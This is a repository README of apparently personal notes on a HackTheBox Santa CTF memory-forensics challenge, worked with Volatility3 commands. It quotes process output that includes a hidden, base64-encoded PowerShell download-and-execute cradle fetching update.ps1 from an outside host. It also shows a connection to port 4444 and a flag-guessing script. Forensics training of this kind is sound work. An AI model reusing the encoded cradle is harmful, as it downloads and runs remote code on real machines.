aaron/htb-santa-ctf
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
Files
580febe5c425f753af3757ecdf19dab686210246
htb-santa-ctf/forensics/honeypot/README.md
aaron 076a5fe8d4 add volatility3 info
2021-12-04 03:21:34 +01:00

125 lines
4.6 KiB
Markdown
Raw Blame History

# Honeypot
Santa really encourages people to be at his good list but sometimes he is a bit
naughty himself. He is using a Windows 7 honeypot to capture any suspicious
action. Since he is not a forensics expert, can you help him identify any
indications of compromise?
1. Find the full URL used to download the malware.
2. Find the malicious's process ID.
3. Find the attackers IP
Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}
Download Link: http://46.101.25.140/forensics_honeypot.zip
## Flag
## Volatility3
### Installation
```bash
git clone git@github.com:volatilityfoundation/volatility3.git
cd volatility3
pipenv install
pipenv shell
```
### Useful Commands
```bash
# get running processes and pid
python vol.py -f ~/git/htb-santa-ctf/forensics/honeypot/honeypot.raw windows.cmdline.CmdLine
# get all connected ips
python vol.py -f ~/git/htb-santa-ctf/forensics/honeypot/honeypot.raw windows.netstat.NetStat
```
## Notes
- The honeypot.zip file contains a windows memory dump
- By using the `volatility3` framework one can extract data from the dump
- By checking `vol -f honeypot.raw windows.cmdline.CMDLine` the malicious process is quite obvious
```bash
cat win_cmdline
... snip ...
3504 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe"
3112 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe
3324 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
3344 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
SCODEF:3324 CREDAT:14337
2700 powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e
aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
3732 conhost.exe \??\C:\Windows\system32\conhost.exe
"288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479
4028 whoami.exe Required memory at 0x7ffdf010 is not valid (process exited?)
4036 HOSTNAME.EXE Required memory at 0x7ffd7010 is not valid (process
exited?)
2924 DumpIt.exe "C:\Users\Santa\Desktop\DumpIt.exe"
2920 conhost.exe \??\C:\Windows\system32\conhost.exe
"280284285205075330588133904-110126809119471720131011406317-845024101-1158882802
168 dllhost.exe C:\Windows\system32\DllHost.exe
/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
```
- The base64 string in the powershell command contains a url which contains a rickroll, this has to be the url
- The PID of said command is 2700
- By examining the currently active connections, using `windows.netscan.Netscan` the following foreign IPs stand out:
```
Volatility 3 Framework 1.0.1
Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner
Created
0x2554b460 TCPv4 10.0.2.15 49226 93.184.220.29 80 ESTABLISHED - - -
0x261e9d30 TCPv4 10.0.2.15 49228 172.67.177.22 443 ESTABLISHED - - -
0x3e2e9cc0 TCPv4 10.0.2.15 49221 212.205.126.106 443 ESTABLISHED - - -
0x3ee98d80 TCPv4 10.0.2.15 49229 147.182.172.189 4444 ESTABLISHED - - -
0x3f1b0df8 TCPv4 10.0.2.15 49216 212.205.126.106 443 ESTABLISHED - - -
0x3f225df8 TCPv4 10.0.2.15 49222 212.205.126.106 443 ESTABLISHED - - -
0x3f547008 TCPv4 10.0.2.15 49220 212.205.126.106 443 ESTABLISHED - - -
0x3f561438 TCPv4 10.0.2.15 49215 204.79.197.203 443 ESTABLISHED - - -
0x3f57c438 TCPv4 10.0.2.15 49218 95.100.210.141 443 ESTABLISHED - - -
0x3f58b4c8 TCPv4 10.0.2.15 49217 212.205.126.106 443 ESTABLISHED - - -
0x3f58c748 TCPv4 10.0.2.15 49223 212.205.126.106 443 ESTABLISHED - - -
0x3f58e9d8 TCPv4 10.0.2.15 49225 172.67.177.22 443 ESTABLISHED - - -
0x3f5c6df8 TCPv4 10.0.2.15 49219 95.100.210.141 443 ESTABLISHED - - -
```
- By eliminating all the ips which belong to M$ we end up with a small set of 5 ips.
- To generate the flag the follwing shell script was used, sadly with no success.
- I'm unsure about the `... | md5sum` part as this adds a hyphen...
```cat generate_flags.sh
#!/bin/bash
list=(
147.182.172.189 # digital ocean
#172.67.177.22 # cloudflare net
#212.205.126.106 # greece
#93.184.220.29 # edgecast
#95.100.210.141 # akamai
)
pids=(
1556 # explorer
2460 # SearchFilterHo
2856 # explorer
3324 # iexplorer
3344 # iexplorer
)
for ip in ${list[@]}; do
for pid in ${pids[@]}; do
echo Generating Flag for $ip and $pid:
echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum}"
echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum)}"
done
done
```
- I don't know, maybe the challenge is borked somehow?
Reference in New Issue View Git Blame Copy Permalink